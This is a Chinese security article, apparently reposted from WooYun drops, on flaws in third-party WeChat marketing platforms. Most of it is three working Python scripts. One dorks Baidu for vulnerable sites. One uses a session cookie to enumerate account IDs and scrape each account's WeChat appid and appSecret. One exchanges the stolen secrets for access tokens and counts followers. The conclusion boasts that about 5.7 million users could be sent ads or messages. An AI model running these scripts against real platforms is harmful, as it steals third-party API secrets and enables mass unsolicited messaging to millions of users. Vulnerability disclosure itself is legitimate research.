是誰讓你我如此近距離（論第三方微信營銷平臺的安全隱患）

原文地址:http://drops.wooyun.org/tips/14016

0x00 簡介

開發微信第三方營銷平臺的人可謂是靠著微信官方開發文檔發家的人，他們把開發文檔變成產品，變成普通人一看就明白的東西，好多搞營銷的不懂技術，好多做技術的不懂營銷，他們可謂在技術和營銷之前有效的搭了一座橋，讓不懂技術的營銷者可以通過第三方平臺方便的接入微信。

微信本身是安全的，但是第三方平臺的安全卻沒的保證，這篇文章就是想說明，在使用第三方平臺便利性的同時埋下的安全隱患

0x01 從一個被忽略的漏洞說起

很不解如此影響深遠的漏洞，為什么會被忽略，是對客戶的不負責任，還是對漏洞本身的不了解

接下來就從這個被忽略的漏洞，挖出其背后成千上萬受影響的用戶

0x02 挖掘過程

#!python #!/usr/bin/env python #coding:utf-8 import requests import re from lxml import etree import sys reload(sys) sys.setdefaultencoding('utf-8') def getSearch(url): headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} content = getContent(url, headers) selector = etree.HTML(content) selectUrl = selector.xpath('//div[@class="f13"]/a[1][email protected]') urls.extend(selectUrl) def getSearchUrl(urls): for url in urls: headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} header = "Location" content = getRespHeader(url, headers, header) selectUrl.append(content) def getContent(url, headers): resp = requests.get(url, headers=headers) return resp.text def getRespHeader(url, headers, header): resp = requests.get(url, headers=headers, allow_redirects=False) return resp.headers.get(header) if __name__ == '__main__': urls = [] selectUrl = [] for i in [0, 10, 20, 30, 40, 50, 60]: url = "http://www.baidu.com/s?wd=inurl%%3Aweb%%2Findex.php%%3Fc%%3Duser%%26a%%3Dlogin%%26&pn=%d&ie=utf-8" %i getSearch(url) getSearchUrl(urls) print selectUrl

本來打算寫個腳本批量注冊然后出appid和key的，但由于有驗證碼，又因為本地驗證碼程序沒有跑起來，而且也就60多個網站，于是乎就手工了一下，然后把拿appid和appSecret的過程寫了個腳本

#!python #!/usr/bin/env python #coding:utf-8 import requests from lxml import etree import sys reload(sys) sys.setdefaultencoding('utf-8') header = {"cookie":"7ba5___session=eyJ1aWQiOiIxMTE1IiwibGFzdHZpc2l0IjoiMTQ1ODQ3NTc1MyIsImxhc3RpcCI6IjIxOC4xMDguMTI4LjEwMSIsImhhc2giOiI4YzcyMjFjOTE4Y2U2NjY1ZTdiMTQxYWJlYmRlZTcxOSJ9","User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} def getcontent(url,header): resp = requests.get(url, headers=header) return resp.text def getkey(html): global count rest = [] selector = etree.HTML(html) weixinAppId = selector.xpath('//input[@name="key"][email protected]') weixinAppSecret = selector.xpath('//input[@name="secret"][email protected]') weixinAppName = selector.xpath('//input[@name="subname"][email protected]') if weixinAppId[0] != '' and weixinAppSecret[0] != '' and weixinAppId[0].find('wx') == 0: print weixinAppName[0] rest.append(weixinAppName[0]) rest.append(weixinAppId[0]) rest.append(weixinAppSecret[0]) str_rest = str(rest).replace('u\'','\'') str_rest = str_rest.decode("unicode-escape") with open('result.txt', 'a') as fs: fs.write(str_rest + '\n') if __name__ == '__main__': for i in range(1, 1056): url = "http://wx.xxx.cn/web/index.php?c=account&a=post&uniacid=84&acid=%d" %i print url html = getcontent(url, header) getkey(html)

#!python # coding:utf-8 import requests import ast count = 0 def getCount(url): global count headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} resp = requests.get(url, headers=headers) con = ast.literal_eval(resp.text) if type(con) == dict and "total" in con: count += int(con["total"]) def getAccesstoken(content): con = ast.literal_eval(content) if type(con) == dict and "access_token" in con: url = "https://api.weixin.qq.com/cgi-bin/user/get?access_token=%s" % con["access_token"] getCount(url) def getContent(line): headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} wxappid = line[1] wxsecret = line[2] url = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s" % (wxappid, wxsecret) resp = requests.get(url, headers=headers) getAccesstoken(resp.text) if __name__ == '__main__': with open('result.txt', 'r') as fs: for line in fs.readlines(): line = line.replace('\r', '').replace('\n', '') getContent(eval(line)) print count

0x03 結尾

這570多萬用戶重復率很低，可以向這570萬用戶推送廣告，可以向這570萬用戶發送消息，可以向這500萬用戶發送一句"你我如此近距離，你卻不知道我是誰"。